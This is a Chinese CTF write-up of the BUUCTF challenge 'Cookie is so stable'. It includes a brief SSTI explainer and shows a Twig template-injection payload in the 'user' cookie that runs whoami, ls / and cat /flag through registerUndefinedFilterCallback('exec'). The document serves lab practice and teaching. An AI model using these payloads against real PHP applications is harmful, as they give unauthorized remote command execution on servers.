BUUCTF——Cookie is so stable

BUUCTF——Cookie is so stable

进入靶场

页面有点熟悉 跟之前做过的靶场有点像

先简单看一看靶场信息

有几个功能点

flag.php

随便输了个admin

根据题目提示

应该与cookie有关

抓包看看

构造payload

Cookie: PHPSESSID=ef0623af2c1a6d2012d57f3529427d52;   user={{7*'7'}}

有回显

漏洞能利用

确定了是SSTI注入漏洞

简单解释一下SSTI注入漏洞

SSTI（Server-Side Template Injection）是一种服务器端模板注入漏洞，发生在应用程序使用模板引擎渲染用户输入时。当用户输入被直接嵌入到模板中而没有经过适当处理时，攻击者可以注入模板指令，从而在服务器上执行任意代码。

常见的易受攻击的模板引擎

1. Java: FreeMarker, Velocity, Thymeleaf
2. Python: Jinja2, Mako, Tornado
3. PHP: Twig, Smarty
4. JavaScript: Pug (Jade), Handlebars, EJS
5. Ruby: ERB, Slim

漏洞原理

当应用程序这样处理用户输入时容易受到攻击：

# 危险示例 (Python/Jinja2)
from jinja2 import Templateuser_input = request.GET.get('name')
template = Template("Hello " + user_input)
rendered = template.render()

攻击者可以提交{{7*7}}作为输入，如果输出是Hello 49，则表明存在SSTI漏洞。

漏洞危害

1. 远程代码执行（RCE）
2. 敏感信息泄露
3. 服务器文件系统访问
4. 网络访问
5. 权限提升

检测方法

尝试插入简单的模板表达式如{{7*7}}、${7*7}或<%= 7*7 %>，观察是否被计算

确定是php的SSTI漏洞

构造payload

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("whoami")}}

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("ls /")}}

回显不完整，那就盲猜在根目录下

构造payload直接读取

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

拿到flag

flag{82e4f065-ae52-4f68-b994-ef7cd86b13be}

下播！！！！